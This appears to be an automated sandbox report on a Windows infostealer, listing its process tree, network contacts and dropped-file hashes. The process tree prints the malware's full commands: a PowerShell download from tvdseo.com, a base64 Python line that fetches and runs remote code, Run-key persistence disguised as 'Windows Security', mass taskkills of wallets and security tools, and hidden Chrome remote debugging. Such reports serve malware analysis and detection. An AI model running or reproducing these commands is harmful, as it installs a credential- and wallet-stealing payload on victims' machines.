PID 3408 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\11.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("wscript.shell").run("""C:\Users\Admin\AppData\Local\Temp\11.bat"" ::",0)(window.close)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\11.bat" ::"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/wp-content/cache/wp-rocket/synaptics.zip', [System.IO.Path]::GetTempPath() + 'x1FWfQj3f9.zip') "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $dst = [System.IO.Path]::Combine([System.Environment]::GetFolderPath('LocalApplicationData'), 'x1FWfQj3f9'); Add-Type -AssemblyName System.IO.Compression.FileSystem; if (Test-Path $dst) { Remove-Item -Recurse -Force "$dst\*" } else { New-Item -ItemType Directory -Force $dst } ; [System.IO.Compression.ZipFile]::ExtractToDirectory([System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), 'x1FWfQj3f9.zip'), $dst) "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $s = $payload = "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS93cC1jb250ZW50L2NhY2hlL3dwLXJvY2tldC9YLU1ldGEvWC1NZXRhJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))";$obj = New-Object -ComObject WScript.Shell;$link = $obj.CreateShortcut("$env:LOCALAPPDATA\WindowsSecurity.lnk");$link.WindowStyle = 7;$link.TargetPath = "$env:LOCALAPPDATA\x1FWfQj3f9\synaptics.exe";$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";$link.Arguments = "-c `"$payload`"";$link.Save() "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security' -PropertyType String -Value 'C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\WindowsSecurity.lnk' -Force "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

cmd.exe /c start "" "C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS93cC1jb250ZW50L2NhY2hlL3dwLXJvY2tldC9YLU1ldGEvWC1NZXRhJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))"

C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe

"C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS93cC1jb250ZW50L2NhY2hlL3dwLXJvY2tldC9YLU1ldGEvWC1NZXRhJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM Coinomi.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM bytecoin-gui.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM Element.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM "Atomic Wallet.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM Exodus.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM ArmoryQt.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM Guarda.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM KeePassXC.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM NordVPN.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM OpenVPNConnect.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM seamonkey.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM Signal.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM filezilla.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM filezilla-server-gui.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM keepassxc-proxy.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM nordvpn-service.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM steam.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM walletd.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM waterfox.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM Discord.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM DiscordCanary.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM burp.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM Ethereal.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM EtherApe.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM HTTPDebuggerSvc.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM HTTPDebuggerUI.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM snpa.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM solarwinds.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM telerik.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM winpcap.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM telegram.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa7ba1cc40,0x7ffa7ba1cc4c,0x7ffa7ba1cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1916,i,15968624592994161905,3449659487766153157,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1912 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --no-appcompat-clear --field-trial-handle=1992,i,15968624592994161905,3449659487766153157,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1960 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=2056,i,15968624592994161905,3449659487766153157,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2452 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2900,i,15968624592994161905,3449659487766153157,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2908 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2912,i,15968624592994161905,3449659487766153157,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2936 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4048,i,15968624592994161905,3449659487766153157,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4016 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=4120,i,15968624592994161905,3449659487766153157,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4100 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=4116,i,15968624592994161905,3449659487766153157,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4156 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 tvdseo.com udp
US 86.38.202.97:443 tvdseo.com tcp
US 8.8.8.8:53 97.202.38.86.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 86.38.202.97:443 tvdseo.com tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.200.36:443 www.google.com udp
GB 142.250.200.36:443 www.google.com tcp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 42.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 36.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.178.10:443 ogads-pa.googleapis.com udp
GB 142.250.179.238:443 apis.google.com udp
GB 142.250.178.10:443 ogads-pa.googleapis.com tcp
US 8.8.8.8:53 3.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 10.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 216.58.201.110:443 play.google.com udp
GB 216.58.201.110:443 play.google.com tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 86.38.202.97:443 tvdseo.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 86.38.202.97:443 tvdseo.com tcp
US 208.95.112.1:80 ip-api.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 mew.servepics.com udp
VN 103.176.110.245:25902 mew.servepics.com tcp
US 8.8.8.8:53 245.110.176.103.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kaqb0pf3.2r1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3680-11-0x0000027860920000-0x0000027860942000-memory.dmp

memory/3680-12-0x000002787B2E0000-0x000002787B324000-memory.dmp

memory/3680-13-0x000002787B3B0000-0x000002787B426000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 3f01549ee3e4c18244797530b588dad9
SHA1 3e87863fc06995fe4b741357c68931221d6cc0b9
SHA256 36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a
SHA512 73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 e4de99c1795fd54aa87da05fa39c199c
SHA1 dfaaac2de1490fae01104f0a6853a9d8fe39a9d7
SHA256 23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457
SHA512 796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 a26df49623eff12a70a93f649776dab7
SHA1 efb53bd0df3ac34bd119adf8788127ad57e53803
SHA256 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512 e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

memory/5048-30-0x0000020030710000-0x000002003071A000-memory.dmp

memory/5048-31-0x0000020030A90000-0x0000020030AA2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\x1FWfQj3f9.zip

MD5 9c645b1011a1ca4868b00708fb8530c6
SHA1 bc48cc7f83b6588178796fa3922b6ded0af8b1c2
SHA256 b9e43e501ca30487cf556b8bfe5ea644cd130d1f5cce8f7fbeb4a68eef976d99
SHA512 3ede798b75a6fe6fdd017e5514ee6193409cc27b1b6c42be46e8d74fa5c4b97f55b90927ae66c4266bcf2f7c115310d0e01e1ba2e2cd595cd363556200e1d80d

C:\Users\Admin\AppData\Local\x1FWfQj3f9\Lib\site-packages\pyasn1\codec\der\__init__.py

MD5 0fc1b4d3e705f5c110975b1b90d43670
SHA1 14a9b683b19e8d7d9cb25262cdefcb72109b5569
SHA256 1040e52584b5ef6107dfd19489d37ff056e435c598f4e555f1edf4015e7ca67d
SHA512 8a147c06c8b0a960c9a3fa6da3b30a3b18d3612af9c663ee24c8d2066f45419a2ff4aa3a636606232eca12d7faef3da0cbbd3670a2d72a3281544e1c0b8edf81

C:\Users\Admin\AppData\Local\x1FWfQj3f9\Lib\site-packages\win32comext\axscript\__init__.py

MD5 f45c606ffc55fd2f41f42012d917bce9
SHA1 ca93419cc53fb4efef251483abe766da4b8e2dfd
SHA256 f0bb50af1caea5b284bd463e5938229e7d22cc610b2d767ee1778e92a85849b4
SHA512 ba7bebe62a6c2216e68e2d484c098662ba3d5217b39a3156b30e776d2bb3cf5d4f31dcdc48a2eb99bc5d80fffe388b212ec707b7d10b48df601430a07608fd46

C:\Users\Admin\AppData\Local\x1FWfQj3f9\Lib\site-packages\win32comext\taskscheduler\__init__.py

MD5 3d90a8bdf51de0d7fae66fc1389e2b45
SHA1 b1d30b405f4f6fce37727c9ec19590b42de172ee
SHA256 7d1a6fe54dc90c23b0f60a0f0b3f9d5cae9ac1afecb9d6578f75b501cde59508
SHA512 bd4ea236807a3c128c1ec228a19f75a0a6ef2b29603c571ee5d578847b20b395fec219855d66a409b5057b5612e924edcd5983986bef531f1309aba2fe7f0636

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 ec874c6ac146acbfa903d4504f642afd
SHA1 bc85bcec3169406ea11b4fe48f2b96206cfd44db
SHA256 891ab297bddd63e05975158a456b8152449d9b872cc27b684f55aff6842ac57c
SHA512 8e30466023ac0a874d7c94f71533ac389d8668eca23095eea265c5459a53f4af9d1bd144594b793002f521df8b13956afd2ecfc47a0783ed12f983ec34949c3e

C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe

MD5 8ad6c16026ff6c01453d5fa392c14cb4
SHA1 69535b162ff00a1454ba62d6faba549b966d937f
SHA256 ff507b25af4b3e43be7e351ec12b483fe46bdbc5656baae6ad0490c20b56e730
SHA512 6d8042a6c8e72f76b2796b6a33978861aba2cfd8b3f8de2088bbff7ea76d91834c86fa230f16c1fddae3bf52b101c61cb19ea8d30c6668408d86b2003abd0967

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 cac81901f1591e318662ee0017a4a464
SHA1 fd67f108ab74e111f18cb3a39be32935c9e444cd
SHA256 2ddd2e36b9c2d03c3b7a4cad4e77036ef72d0518bc11f6684e919dc62f846ba5
SHA512 6280e10c7fcd981eda6bd48fd5c98673026134df3a47740082b9b738fa3be1fe1a7159ccfb78b3ba75770c75a3fec2ae9ccb4a5ee52e2bb289c38a3c7d2ea1a8

C:\Users\Admin\AppData\Local\x1FWfQj3f9\VCRUNTIME140.dll

MD5 1a84957b6e681fca057160cd04e26b27
SHA1 8d7e4c98d1ec858db26a3540baaaa9bbf96b5bfe
SHA256 9faeaa45e8cc986af56f28350b38238b03c01c355e9564b849604b8d690919c5
SHA512 5f54c9e87f2510c56f3cf2ceeb5b5ad7711abd9f85a1ff84e74dd82d15181505e7e5428eae6ff823f1190964eb0a82a569273a4562ec4131cecfa00a9d0d02aa

C:\Users\Admin\AppData\Local\x1FWfQj3f9\python310.dll

MD5 73cadab187ad5e06bef954190478e3aa
SHA1 18ab7b6fe86193df108a5a09e504230892de453e
SHA256 b4893ed4890874d0466fca49960d765dd4c2d3948a47d69584f5cc51bbbfa4c9
SHA512 b2ebe575f3252ff7abebab23fc0572fc8586e80d902d5a731fb7bd030faa47d124240012e92ffe41a841fa2a65c7fb110af7fb9ab6e430395a80e925283e2d4d

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\encodings\__init__.py

MD5 7e6a62ef920ccbbc78acc236fdf027b5
SHA1 816afc9ea3c9943e6a7e2fae6351530c2956f349
SHA256 93cfd89699b7f800d6ccfb93266da4db6298bd73887956148d1345d5ca6742a9
SHA512 c883b506aacd94863a0dd8c890cbf7d6b1e493d1a9af9cdf912c047b1ca98691cfd910887961dd94825841b0fe9dadd3ab4e7866e26e10bfbbae1a2714a8f983

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\codecs.py

MD5 8e0d20f2225ead7947c73c0501010b0e
SHA1 9012e38b8c51213b943e33b8a4228b6b9effc8bc
SHA256 4635485d9d964c57317126894adaca91a027e017aefd8021797b05415e43dbb4
SHA512 d95b672d4be4ca904521c371da4255d9491c9fc4d062eb6cf64ef0ab9cd4207c319bbd5caabe7adb2aaaa5342dee74e3d67c9ea7d2fe55cb1b85df11ee7e3cd3

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\encodings\aliases.py

MD5 ff23f6bb45e7b769787b0619b27bc245
SHA1 60172e8c464711cf890bc8a4feccff35aa3de17a
SHA256 1893cfb597bc5eafd38ef03ac85d8874620112514eb42660408811929cc0d6f8
SHA512 ea6b685a859ef2fcd47b8473f43037341049b8ba3eea01d763e2304a2c2adddb01008b58c14b4274d9af8a07f686cd337de25afeb9a252a426d85d3b7d661ef9

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\encodings\utf_8.py

MD5 f932d95afcaea5fdc12e72d25565f948
SHA1 2685d94ba1536b7870b7172c06fe72cf749b4d29
SHA256 9c54c7db8ce0722ca4ddb5f45d4e170357e37991afb3fcdc091721bf6c09257e
SHA512 a10035ae10b963d2183d31c72ff681a21ed9e255dda22624cbaf8dbed5afbde7be05bb719b07573de9275d8b4793d2f4aef0c0c8346203eea606bb818a02cab6

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\encodings\cp1252.py

MD5 52084150c6d8fc16c8956388cdbe0868
SHA1 368f060285ea704a9dc552f2fc88f7338e8017f2
SHA256 7acb7b80c29d9ffda0fe79540509439537216df3a259973d54e1fb23c34e7519
SHA512 77e7921f48c9a361a67bae80b9eec4790b8df51e6aff5c13704035a2a7f33316f119478ac526c2fdebb9ef30c0d7898aea878e3dba65f386d6e2c67fe61845b4

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\io.py

MD5 99710b1a7d4045b9334f8fc11b084a40
SHA1 7032facde0106f7657f25fb1a80c3292f84ec394
SHA256 fe91b067fd544381fcd4f3df53272c8c40885c1811ac2165fd6686623261bc5d
SHA512 ac1b4562ed507bcccc2bdfd8cab6872a37c081be4d5398ba1471d84498c322dcaa176eb1dda23daaddd4cebfcd820b319ddcb33c3972ebf34b32393ad8bd0412

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\abc.py

MD5 3a8e484dc1f9324075f1e574d7600334
SHA1 d70e189ba3a4cf9bea21a1bbc844479088bbd3a0
SHA256 a63de23d93b7cc096ae5df79032dc2e12778b134bb14f7f40ac9a1f77f102577
SHA512 2c238b25dd1111ee37a3d7bf71022fe8e6c1d7ece86b6bbdfa33ee0a3f2a730590fe4ba86cc88f4194d60f419f0fef09776e5eca1c473d3f6727249876f00441

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\site.py

MD5 23cf5b302f557f7461555a35a0dc8c15
SHA1 50daac7d361ced925b7fd331f46a3811b2d81238
SHA256 73607e7b809237d5857b98e2e9d503455b33493cde1a03e3899aa16f00502d36
SHA512 e3d8449a8c29931433dfb058ab21db173b7aed8855871e909218da0c36beb36a75d2088a2d6dd849ec3e66532659fdf219de00184b2651c77392994c5692d86b

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\os.py

MD5 8180e937086a657d6b15418ff4215c35
SHA1 232e8f00eed28be655704eccdab3e84d66cc8f53
SHA256 521f714dc038e0faa53e7de3dbccae0631d96a4d2d655f88b970bd8cf29ec750
SHA512 a682a8f878791510a27de3a0e407889d3f37855fb699320b4355b48cb23de69b89dadd77fdcca33ef8e5855278e584b8e7947b626d6623c27521d87eae5a30d5

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\stat.py

MD5 7a7143cbe739708ce5868f02cd7de262
SHA1 e915795b49b849e748cdbd8667c9c89fcdff7baf
SHA256 e514fd41e2933dd1f06be315fb42a62e67b33d04571435a4815a18f490e0f6ce
SHA512 7ecf6ac740b734d26d256fde2608375143c65608934aa51df7af34a1ee22603a790adc5b3d67d6944ba40f6f41064fa4d6957e000de441d99203755820e34d53

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\_collections_abc.py

MD5 faa0e5d517cf78b567a197cb397b7efc
SHA1 2d96f3e00ab19484ff2487c5a8b59dfe56a1c3ac
SHA256 266ccceb862ea94e2b74fdda4835f8ef149d95c0fc3aafe12122d0927e686dd3
SHA512 295601f6a33dd0e9c38b5756bfa77c79402e493362fb7f167b98a12208bac765101e91a66398d658e1673b7624c8d1a27f6e12ec32fef22df650b64e7728ca8d

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\ntpath.py

MD5 7d31906afdc5e38f5f63bfeeb41e2ef2
SHA1 bbefd95b28bac9e58e1f1201ae2b39bbe9c17e5f
SHA256 e34494af36d8b596c98759453262d2778a893daa766f96e1bb1ef89d8b387812
SHA512 641b6b2171bb9aae3603be2cbcc7dd7d45968afeb7e0a9d65c914981957ba51b2a1b7d4d9c6aec88cf92863844761accdeca62db62a13d2bc979e5279d7f87a0

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\genericpath.py

MD5 5ad610407613defb331290ee02154c42
SHA1 3ff9028bdf7346385607b5a3235f5ff703bcf207
SHA256 2e162781cd02127606f3f221fcaa19c183672d1d3e20fdb83fe9950ab5024244
SHA512 9a742c168a6c708a06f4307abcb92cede02400bf53a004669b08bd3757d8db7c660934474ec379c0464e17ffd25310dbab525b6991cf493e97dcd49c4038f9b7

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\_sitebuiltins.py

MD5 2e95aaf9bd176b03867862b6dc08626a
SHA1 3afa2761119af29519dc3dad3d6c1a5abca67108
SHA256 924f95fd516ecaea9c9af540dc0796fb15ec17d8c42b59b90cf57cfe15962e2e
SHA512 080495fb15e7c658094cfe262a8bd884c30580fd6e80839d15873f27be675247e2e8aec603d39b614591a01ed49f5a07dd2ace46181f14b650c5e9ec9bb5c292

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\site-packages\_distutils_hack\__init__.py

MD5 128079c84580147fd04e7e070340cb16
SHA1 9bd1ae6606ccd247f80960abbc7d7f78aeec4b86
SHA256 4d27a48545b57dd137ae35376fcf326d2064271084a487960686f8704b94de4a
